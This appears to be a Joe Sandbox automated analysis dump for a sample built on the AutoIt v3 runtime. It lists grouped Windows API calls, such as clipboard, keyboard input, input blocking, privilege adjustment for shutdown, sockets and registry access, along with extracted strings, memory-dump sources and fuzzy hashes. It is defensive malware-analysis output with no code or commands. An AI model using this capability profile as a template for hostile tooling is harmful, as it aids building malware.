                                                                      • String ID:
                                                                      • API String ID:
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      APIs
                                                                      Similarity
                                                                      • API ID: _invalid_parameter_noinfo
                                                                      • String ID:
                                                                      • API String ID: 3215553584-0
                                                                      APIs
                                                                      Similarity
                                                                      • API ID: _invalid_parameter_noinfo
                                                                      • String ID:
                                                                      • API String ID: 3215553584-0
                                                                      APIs
                                                                        • Part of subcall function 00007FF7C0E84970: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7C0E84999
                                                                      • FreeLibrary.KERNEL32(?,?,?,00007FF7C0E9C8FE), ref: 00007FF7C0E5656F
                                                                      Similarity
                                                                      • API ID: FreeLibrary_invalid_parameter_noinfo
                                                                      • String ID:
                                                                      • API String ID: 3938577545-0
                                                                      APIs
                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7C0E74C5C
                                                                        • Part of subcall function 00007FF7C0E75600: std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF7C0E75609
                                                                        • Part of subcall function 00007FF7C0E75600: _CxxThrowException.LIBVCRUNTIME ref: 00007FF7C0E7561A
                                                                      Similarity
                                                                      • API ID: Concurrency::cancel_current_taskExceptionThrowstd::bad_alloc::bad_alloc
                                                                      • String ID:
                                                                      • API String ID: 1680350287-0
                                                                      APIs
                                                                      Similarity
                                                                      • API ID: FileWrite
                                                                      • String ID:
                                                                      • API String ID: 3934441357-0
                                                                      APIs
                                                                      Similarity
                                                                      • API ID: LongNamePath
                                                                      • String ID:
                                                                      • API String ID: 82841172-0
                                                                      APIs
                                                                      Similarity
                                                                      • API ID: IconNotifyShell_
                                                                      • String ID:
                                                                      • API String ID: 1144537725-0
                                                                      APIs
                                                                      Similarity
                                                                      • API ID: Open_onexit
                                                                      • String ID:
                                                                      • API String ID: 3030063568-0
                                                                      APIs
                                                                      Similarity
                                                                      • API ID: Process$CurrentVersionWow64_onexit
                                                                      • String ID:
                                                                      • API String ID: 2932345936-0
                                                                      APIs
                                                                      Similarity
                                                                      • API ID: _onexit
                                                                      • String ID:
                                                                      • API String ID: 572287377-0
                                                                      APIs
                                                                      Similarity
                                                                      • API ID: _onexit
                                                                      • String ID:
                                                                      • API String ID: 572287377-0
                                                                      APIs
                                                                      Similarity
                                                                      • API ID: ErrorLast
                                                                      • String ID:
                                                                      • API String ID: 1452528299-0
                                                                      APIs
                                                                      Similarity
                                                                      • API ID: AllocHeap
                                                                      • String ID:
                                                                      • API String ID: 4292702814-0
                                                                      APIs
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                      • String ID: $AutoIt v3$DISPLAY$static
                                                                      • API String ID: 2211948467-2373415609
                                                                      APIs
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: Window$MessageSend$Menu$Item$EnableInfoMove$DefaultShow$DrawFocusLongRect
                                                                      • String ID: P
                                                                      • API String ID: 1208186926-3110715001
                                                                      APIs
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                      • String ID: A$AutoIt v3$DISPLAY$msctls_progress32$static
                                                                      • API String ID: 2910397461-2439800395
                                                                      APIs
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: Thread$Window$AttachInput$ForegroundVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                      • String ID: Shell_TrayWnd
                                                                      • API String ID: 3778422247-2988720461
                                                                      APIs
                                                                      Similarity
                                                                      • API ID: Destroy$ImageList_Window$DeleteMessageObjectSend$IconMove
                                                                      • String ID:
                                                                      • API String ID: 3372153169-0
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      Similarity
                                                                      • API ID: Process$StationWindow$CloseCurrentHandleUser$CreateDuplicate$BlockDesktopEnvironmentHeapOpenProfileToken$AdjustAllocDestroyErrorLastLoadLogonLookupPrivilegePrivilegesThreadUnloadValuewcscpy
                                                                      • String ID: default$winsta0$winsta0\default
                                                                      • API String ID: 3202303201-1423368268
                                                                      Similarity
                                                                      • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                      • String ID: AutoIt v3 GUI
                                                                      • API String ID: 1458621304-248962490
                                                                      Similarity
                                                                      • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                                                      • String ID:
                                                                      • API String ID: 3222323430-0
                                                                      Similarity
                                                                      • API ID: MessageSend$Menu$InfoItemTextWindow$CharDrawInvalidateNextRect
                                                                      • String ID:
                                                                      • API String ID: 1015379403-0
                                                                      Similarity
                                                                      • API ID: Cursor$Load$ErrorInfoLast
                                                                      • String ID:
                                                                      • API String ID: 3215588206-0
                                                                      Similarity
                                                                      • API ID: CloseValue$ConnectCreateRegistry
                                                                      • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                      • API String ID: 3314541760-966354055
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: P
                                                                      • API String ID: 0-3110715001
                                                                      Similarity
                                                                      • API ID: _get_daylight$ByteCharMultiWide_invalid_parameter_noinfo$InformationTimeZone
                                                                      • String ID: -$:$:$?
                                                                      • API String ID: 3440502458-92861585
                                                                      Similarity
                                                                      • API ID: Time$File$FindLocalSystem$CloseFirst
                                                                      • String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
                                                                      • API String ID: 3232708057-3289030164
                                                                      Similarity
                                                                      • API ID: CurrentDirectoryTime$File$Localwcscat$Systemwcscpy
                                                                      • String ID: *.*
                                                                      • API String ID: 1111067124-438819550
                                                                      Similarity
                                                                      • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                                      • String ID: *.*
                                                                      • API String ID: 1409584000-438819550
                                                                      Similarity
                                                                      • API ID: SendString
                                                                      • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                      • API String ID: 890592661-1007645807
                                                                      • Opcode ID: 6e164f36fc51d55b22e1026945b1aa4b641673a9c64d89865777c7d9524d423d
                                                                      • Instruction ID: f96aaf4daba62758aebe48cb01d4be48f75c411b91a05b681404770057eefb7f
                                                                      • Opcode Fuzzy Hash: 6e164f36fc51d55b22e1026945b1aa4b641673a9c64d89865777c7d9524d423d
                                                                      • Instruction Fuzzy Hash: 87216F22A1C95291FB20FF24E85566AA320BFD8758FD44031D64DC3A58DF7DE645C7A0
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmp
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmp
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmp
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmp
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                                      • String ID: *.*
                                                                      • API String ID: 2640511053-438819550
                                                                      • Opcode ID: d607f8cd377dc7cb12783564cfab50aac2a1e28959c9b0777418728c286e0dff
                                                                      • Instruction ID: dbf4385060ab19ae7d84c85d34e120db2c60c3df0ba2565be7d73809e0f2f755
                                                                      • Opcode Fuzzy Hash: d607f8cd377dc7cb12783564cfab50aac2a1e28959c9b0777418728c286e0dff
                                                                      • Instruction Fuzzy Hash: 2F417C21A0CA5290EA10BF15A8546BAA390FF40FF4FC85131DD6E87794DF7CF58A87A0
                                                                      Similarity
                                                                      • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove
                                                                      • String ID: :$\$\??\%s
                                                                      • API String ID: 3827137101-3457252023
                                                                      • Opcode ID: c042ec0e4a157b4915e6cbee2efc7bd563a20e0e85c4cf7d435b60959deae5d8
                                                                      • Instruction ID: b0ff9617caf9608e0bf4ee560d34d901d5b6e7b8607aad73a9f1a4ee8c885912
                                                                      • Opcode Fuzzy Hash: c042ec0e4a157b4915e6cbee2efc7bd563a20e0e85c4cf7d435b60959deae5d8
                                                                      • Instruction Fuzzy Hash: 6241962161878385E720BF21E8046FDA3A0FF85BA8F840135DA0D87B98DF7CE546C750
                                                                      Similarity
                                                                      • API ID: QueryValue$Close$BuffCharConnectOpenRegistryUpper
                                                                      • String ID:
                                                                      • API String ID: 3218304859-0
                                                                      • Opcode ID: bfd33b311cee2062ccf4f7c99d60df25cce3d62e1d08c3ae9d56584007b3da53
                                                                      • Instruction ID: 0f075e4a6261375b121909f4ff777488e6f23ddd9795c48c225d73bb73c98274
                                                                      • Opcode Fuzzy Hash: bfd33b311cee2062ccf4f7c99d60df25cce3d62e1d08c3ae9d56584007b3da53
                                                                      • Instruction Fuzzy Hash: 5CF18176B49B428AEB10FF65D0902ACB370FB84BA8B858531DE4D87B95DF38E051C794
                                                                      Similarity
                                                                      • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                                                                      • String ID:
                                                                      • API String ID: 2762341140-0
                                                                      • Opcode ID: 28da4375d56d9c7790266f2ac16f9c30a3cff06f711ae95f6c1a6b970e5d2d74
                                                                      • Instruction ID: 6008e5cc6e542e71c08422efce17f4284e99987775f15fa21d34e8b47cbe8012
                                                                      • Opcode Fuzzy Hash: 28da4375d56d9c7790266f2ac16f9c30a3cff06f711ae95f6c1a6b970e5d2d74
                                                                      • Instruction Fuzzy Hash: 34C14936748B8585EB10FF26E8841ADB760FB88BA8F854036DE4E87765DF38E445C750
                                                                      Similarity
                                                                      • API ID: Security$DescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                      • String ID:
                                                                      • API String ID: 1255039815-0
                                                                      • Opcode ID: 5c88d37276b46e33d2a1e391526b812f5276439b55f88bb912c7bbc104166e1e
                                                                      • Instruction ID: cb4c4ae655be4665347e62f38aa3779edbbdfbad391f6040f7e854cccee61917
                                                                      • Opcode Fuzzy Hash: 5c88d37276b46e33d2a1e391526b812f5276439b55f88bb912c7bbc104166e1e
                                                                      • Instruction Fuzzy Hash: BE619F22B0865286EB10FF71D8445ADB7A4FB44BA8F848136DE0D93795DF38E445C3E4
                                                                      Similarity
                                                                      • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                                      • String ID:
                                                                      • API String ID: 2395222682-0
                                                                      • Opcode ID: 392a36257488f8891aba19e7c901252a1c57c9e7be585a14d68986620d9dc28e
                                                                      • Instruction ID: 0d411232f44503d991bdff1265e52e1b2941cb4f2d24fb3005b57c0cfbf05d0e
                                                                      • Opcode Fuzzy Hash: 392a36257488f8891aba19e7c901252a1c57c9e7be585a14d68986620d9dc28e
                                                                      • Instruction Fuzzy Hash: 40D18F36B48B4686EB10BF75D4402ADB3B5FB88B98B904036CE5D97B64DF38E945C390
                                                                      Similarity
                                                                      • API ID: MessageSend$LongWindow
                                                                      • String ID:
                                                                      • API String ID: 312131281-0
                                                                      • Opcode ID: abdc22e6bb891721ce5e067b69be811f88521fd2379c3c8bf9918a79da049ba4
                                                                      • Instruction ID: 3d5850d19a517e3f74e8760f0aaac590f34d14e20a079e5ae0a07ae91bb25e0c
                                                                      • Opcode Fuzzy Hash: abdc22e6bb891721ce5e067b69be811f88521fd2379c3c8bf9918a79da049ba4
                                                                      • Instruction Fuzzy Hash: 2F71C676A09AD185E720EF65D8449EEB760FB88BA8F844032DE4D87B54CF7CE186C750
                                                                      Similarity
                                                                      • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                      • String ID:
                                                                      • API String ID: 1737998785-0
                                                                      • Opcode ID: d2932478822d6cf8368c376b04bf61354339a6436dc2c20ea892730455b54822
                                                                      • Instruction ID: 5a06378dd0712c68e2531ee1b519367687bb1fbfd96330e33c7d47e3f40c69e3
                                                                      • Opcode Fuzzy Hash: d2932478822d6cf8368c376b04bf61354339a6436dc2c20ea892730455b54822
                                                                      • Instruction Fuzzy Hash: 80414C76A4CA4282EB05BF55D494339A760FF54BA9F844435CA4E873A2DFBCF08187A4
                                                                      Similarity
                                                                      • API ID: File$Find$Delete$AttributesCloseCopyFirstFullMoveNameNextPath
                                                                      • String ID: \*.*
                                                                      • API String ID: 4047182710-1173974218
                                                                      • Opcode ID: 3e5e0e112cc80aa2c2516f057e4a01b659553512389772208b3739e74699da54
                                                                      • Instruction ID: 5fe4999f39fa05dad17424cc0d5d07c2b1856940f6e76b1a87edac0d11824157
                                                                      • Opcode Fuzzy Hash: 3e5e0e112cc80aa2c2516f057e4a01b659553512389772208b3739e74699da54
                                                                      • Instruction Fuzzy Hash: 74816822A58A4295EB10FF65E4401FDA760EB847A4FC41032EA8D877A5DF7CF589C7A0
                                                                      Similarity
                                                                      • API ID: ErrorLast$closesocket$bindlistensocket
                                                                      • String ID:
                                                                      • API String ID: 540024437-0
                                                                      • Opcode ID: f24216cf85a9cfc84ec9f45b81836fed2d974ebfd3edccbe64e1b0b478a4ea6b
                                                                      • Instruction ID: 8e3fdf581117b70edd47e6d6a6b58e7b1de5cfbfcd0b780de82f7ff31c1a5b0d
                                                                      • Opcode Fuzzy Hash: f24216cf85a9cfc84ec9f45b81836fed2d974ebfd3edccbe64e1b0b478a4ea6b
                                                                      • Instruction Fuzzy Hash: 8F419262A4CA4285EB10FF26944427DA760FB85FB4F844630DAAE87792DF3CF1418790
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: NULL Pointer assignment$Not an Object type
                                                                      • API String ID: 0-572801152
                                                                      • Opcode ID: 3b41e49848b2a854f69dbea14d55eff9d78a714003a2fd806a44bf0603c53a60
                                                                      • Instruction ID: 71a13d62303229e0dddcae8eb078674ca7b3eeba0e323233a36a1b68d6450bf0
                                                                      • Opcode Fuzzy Hash: 3b41e49848b2a854f69dbea14d55eff9d78a714003a2fd806a44bf0603c53a60
                                                                      • Instruction Fuzzy Hash: 59E10732A08B8686EB10FF65D5402ADB7A0FB847A8F904236DE5D87B94DF3CE545C790
                                                                      Similarity
                                                                      • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                      • String ID: \*.*
                                                                      • API String ID: 2649000838-1173974218
                                                                      • Opcode ID: 33faa39baa03be8120850797a18634ea376334063adf963c1f4e83021c640b6d
                                                                      • Instruction ID: ff6d0c1d7acbe0ef8c56aa684d261cb2fe790e9b87121310cb56d72af10abe11
                                                                      • Opcode Fuzzy Hash: 33faa39baa03be8120850797a18634ea376334063adf963c1f4e83021c640b6d
                                                                      • Instruction Fuzzy Hash: 9D417222A68A4292EA50FF10E4401EDE360FB94BA4FD41131EA5E87795DF7CE549CBA0
                                                                      Similarity
                                                                      • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                      • String ID:
                                                                      • API String ID: 1239891234-0
                                                                      APIs
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState
                                                                      • String ID: *.*
                                                                      • API String ID: 1927845040-438819550
                                                                      APIs
                                                                      Similarity
                                                                      • API ID: ErrorLastinet_addrsocket
                                                                      • String ID:
                                                                      • API String ID: 4170576061-0
                                                                      APIs
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: _handle_error
                                                                      • String ID: !$VUUU$fmod
                                                                      • API String ID: 1757819995-2579133210
                                                                      APIs
                                                                      • _invalid_parameter_noinfo.LIBCMT ref: 00007FF7C0E92D60
                                                                        • Part of subcall function 00007FF7C0E8B184: GetCurrentProcess.KERNEL32(00007FF7C0E8B21D), ref: 00007FF7C0E8B1B1
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: CurrentProcess_invalid_parameter_noinfo
                                                                      • String ID: *$.$.
                                                                      • API String ID: 2518042432-2112782162
                                                                      APIs
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: System$AdjustErrorExitInitiateLastLookupPowerPrivilegePrivilegesShutdownStateTokenValueWindows
                                                                      • String ID: SeShutdownPrivilege
                                                                      • API String ID: 2163645468-3733053543
                                                                      APIs
                                                                      Strings
                                                                      • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00007FF7C0E75C43
                                                                      Similarity
                                                                      • API ID: DebugDebuggerErrorLastOutputPresentString
                                                                      • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                      • API String ID: 389471666-631824599
                                                                      APIs
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: AddressLibraryLoadProc
                                                                      • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                      • API String ID: 2574300362-3689287502
                                                                      APIs
                                                                      Similarity
                                                                      • API ID: Variant$ClearInit$CopyCreateInitializeInstanceUninitialize
                                                                      • String ID:
                                                                      • API String ID: 2733932498-0
                                                                      APIs
                                                                      Similarity
                                                                      • API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32
                                                                      • String ID:
                                                                      • API String ID: 2000298826-0
                                                                      APIs
                                                                      Similarity
                                                                      • API ID: KeyboardState$InputMessagePostSend
                                                                      • String ID:
                                                                      • API String ID: 432972143-0
                                                                      APIs
                                                                      Similarity
                                                                      • API ID: Find$File$CloseFirstNext
                                                                      • String ID:
                                                                      • API String ID: 3541575487-0
                                                                      APIs
                                                                      Similarity
                                                                      • API ID: ErrorMode$DiskFreeSpace
                                                                      • String ID:
                                                                      • API String ID: 1682464887-0
                                                                      APIs
                                                                      Similarity
                                                                      • API ID: AdjustConcurrency::cancel_current_taskErrorLastLookupPrivilegePrivilegesTokenValue
                                                                      • String ID:
                                                                      • API String ID: 2278415577-0
                                                                      APIs
                                                                      Similarity
                                                                      • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                      • String ID:
                                                                      • API String ID: 3429775523-0
                                                                      Strings
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: .
                                                                      • API String ID: 0-248832578
                                                                      APIs
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: _invalid_parameter_noinfomouse_event
                                                                      • String ID: DOWN
                                                                      • API String ID: 17014623-711622031
                                                                      APIs
                                                                      Similarity
                                                                      • API ID: Find$CloseFileFirst
                                                                      • String ID:
                                                                      • API String ID: 2295610775-0
                                                                      APIs
                                                                      Similarity
                                                                      • API ID: ErrorFormatLastMessage
                                                                      • String ID:
                                                                      • API String ID: 3479602957-0
                                                                      APIs
                                                                      Similarity
                                                                      • API ID: AdjustCloseHandlePrivilegesToken
                                                                      • String ID:
                                                                      • API String ID: 81990902-0
                                                                      APIs
                                                                      Similarity
                                                                      • API ID: FileInternetRead_invalid_parameter_noinfo
                                                                      • String ID:
                                                                      • API String ID: 101623796-0
                                                                      APIs
                                                                      Similarity
                                                                      • API ID: BlockInput
                                                                      • String ID:
                                                                      • API String ID: 3456056419-0
                                                                      APIs
                                                                      Similarity
                                                                      • API ID: NameUser
                                                                      • String ID:
                                                                      • API String ID: 2645101109-0
                                                                      APIs
                                                                      Similarity
                                                                      • API ID: HeapProcess
                                                                      • String ID:
                                                                      • API String ID: 54951025-0
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      Similarity
                                                                      • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                                      • String ID:
                                                                      • API String ID: 3521893082-0
                                                                      Similarity
                                                                      • API ID: ErrorMode$DriveType
                                                                      • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                      • API String ID: 2907320926-4222207086
                                                                      Similarity
                                                                      • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                      • String ID:
                                                                      • API String ID: 1996641542-0
                                                                      Similarity
                                                                      • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                      • String ID: tooltips_class32
                                                                      • API String ID: 698492251-1918224756
                                                                      Similarity
                                                                      • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                                      • String ID: @
                                                                      • API String ID: 3869813825-2766056989
                                                                      Similarity
                                                                      • API ID: Color$LongWindow$ModeObjectStockText
                                                                      • String ID:
                                                                      • API String ID: 554392163-0
                                                                      Similarity
                                                                      • API ID: wcscat$FileInfoQueryValueVersion$Sizewcscpywcsstr
                                                                      • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                      • API String ID: 222038402-1459072770
                                                                      Similarity
                                                                      • API ID: BuffCharMessageSendUpper
                                                                      • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                      • API String ID: 3974292440-4258414348
                                                                      Similarity
                                                                      • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreenwcscat
                                                                      • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                      • API String ID: 2091158083-3440237614
                                                                      Similarity
                                                                      • API ID: SendString$BuffCharDriveLowerType
                                                                      • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                      • API String ID: 1600147383-4113822522
                                                                      Similarity
                                                                      • API ID: Load$Image$IconLibraryMessageSend_invalid_parameter_noinfo$DestroyExtractFree
                                                                      • String ID: .dll$.exe$.icl
                                                                      • API String ID: 258715311-1154884017
                                                                      Similarity
                                                                      • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                      • String ID:
                                                                      • API String ID: 3840717409-0
                                                                      Similarity
                                                                      • API ID: Variant$ClearInit
                                                                      • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                                      • API String ID: 2610073882-3931177956
                                                                      Similarity
                                                                      • API ID: Filewcscat$DeleteTemp$NamePath_fread_nolock_invalid_parameter_noinfowcscpy
                                                                      • String ID: aut
                                                                      • API String ID: 130057722-3010740371
                                                                      Similarity
                                                                      • API ID: Window$MessageSend$CreateDestroy$DesktopRect
                                                                      • String ID: tooltips_class32
                                                                      • API String ID: 2443926738-1918224756
                                                                      Similarity
                                                                      • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                      • String ID:
                                                                      • API String ID: 2598888154-3916222277
                                                                      Similarity
                                                                      • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                      • String ID: NULL Pointer assignment
                                                                      • API String ID: 2706829360-2785691316
                                                                      APIs
                                                                      • CharUpperBuffW.USER32(?,?,?,00000000,?,?,?,00007FF7C0EEFD7B), ref: 00007FF7C0EF1143
                                                                      Similarity
                                                                      • API ID: BuffCharUpper
                                                                      • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                      • API String ID: 3964851224-909552448
                                                                      Similarity
                                                                      • API ID: CurrentDirectory$AttributesFilewcscat$wcscpy
                                                                      • String ID: *.*
                                                                      • API String ID: 4125642244-438819550
                                                                      Similarity
                                                                      • API ID: ItemMenu$Info$CheckCountRadioSleep
                                                                      • String ID: P
                                                                      • API String ID: 1460738036-3110715001
                                                                      Similarity
                                                                      • API ID: LoadStringwprintf
                                                                      • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                                                      • API String ID: 3297454147-3080491070
                                                                      Similarity
                                                                      • API ID: HandleLoadModuleString$Messagewprintf
                                                                      • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                      • API String ID: 4051287042-2268648507
                                                                      Similarity
                                                                      • API ID: Thread$Window$CurrentMessageProcessSendSleep$ActiveAttachDialogEnumFindInputTimeWindowstime
                                                                      • String ID: BUTTON
                                                                      • API String ID: 3935177441-3405671355
                                                                      Similarity
                                                                      • API ID: Destroy$AcceleratorKillTableTimerWindow
                                                                      • String ID:
                                                                      • API String ID: 1974058525-0
                                                                      APIs
                                                                      Similarity
                                                                      • API ID: Window$ItemMoveRect$Invalidate
                                                                      • String ID:
                                                                      • API String ID: 3096461208-0
                                                                      APIs
                                                                      Similarity
                                                                      • API ID: State$Async$Keyboard
                                                                      • String ID:
                                                                      • API String ID: 541375521-0
                                                                      APIs
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: BuffCharDriveLowerTypewcscpy
                                                                      • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                      • API String ID: 1561581874-1000479233
                                                                      APIs
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout
                                                                      • String ID: %s%u
                                                                      • API String ID: 1412819556-679674701
                                                                      APIs
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: ClassName$Window$Text$BuffCharRectUpperwcsstr
                                                                      • String ID: ThumbnailClass
                                                                      • API String ID: 4010642439-1241985126
                                                                      APIs
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                                      • String ID: P
                                                                      • API String ID: 1268354404-3110715001
                                                                      APIs
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: LoadStringwprintf
                                                                      • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                      • API String ID: 3297454147-2391861430
                                                                      APIs
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue
                                                                      • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                      • API String ID: 3030280669-22481851
                                                                      APIs
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: Window$CreateMessageObjectSend$AttributesCompatibleDeleteDestroyLayeredLongMovePixelSelectStock
                                                                      • String ID: static
                                                                      • API String ID: 3821898125-2160076837
                                                                      APIs
                                                                      Similarity
                                                                      • API ID: Security$DescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                      • String ID:
                                                                      • API String ID: 1255039815-0
                                                                      APIs
                                                                      Similarity
                                                                      • API ID: State$Async$Keyboard
                                                                      • String ID:
                                                                      • API String ID: 541375521-0
                                                                      APIs
                                                                        • Part of subcall function 00007FF7C0E56838: CreateFileW.KERNELBASE ref: 00007FF7C0E568A2
                                                                        • Part of subcall function 00007FF7C0E74380: GetCurrentDirectoryW.KERNEL32(?,00007FF7C0E5E817), ref: 00007FF7C0E7439C
                                                                        • Part of subcall function 00007FF7C0E556D4: GetFullPathNameW.KERNEL32(?,00007FF7C0E556C1,?,00007FF7C0E57A0C,?,?,?,00007FF7C0E5109E), ref: 00007FF7C0E556FF
                                                                      • SetCurrentDirectoryW.KERNEL32 ref: 00007FF7C0E5E8B0
                                                                      • SetCurrentDirectoryW.KERNEL32 ref: 00007FF7C0E5E9FA
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: CurrentDirectory$CreateFileFullNamePathwcscpy
                                                                      • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                                      • API String ID: 2207129308-1018226102
                                                                      APIs
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                                                                      • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                      • API String ID: 636576611-1287834457
                                                                      APIs
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: Icmp$CleanupCloseCreateEchoFileHandleSendStartupgethostbynameinet_addr
                                                                      • String ID: 5$Ping
                                                                      • API String ID: 1486594354-1972892582
                                                                      APIs
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: _invalid_parameter_noinfo
                                                                      • String ID: INF$NAN$NAN(IND)$NAN(SNAN)$inf$nan$nan(ind)$nan(snan)
                                                                      • API String ID: 3215553584-2617248754
                                                                      APIs
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: Error$Mode$DiskFreeLastSpace
                                                                      • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                      • API String ID: 4194297153-14809454
                                                                      APIs
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: HandleLoadMessageModuleStringwprintf
                                                                      • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                      • API String ID: 4007322891-4153970271
                                                                      APIs
                                                                      Strings
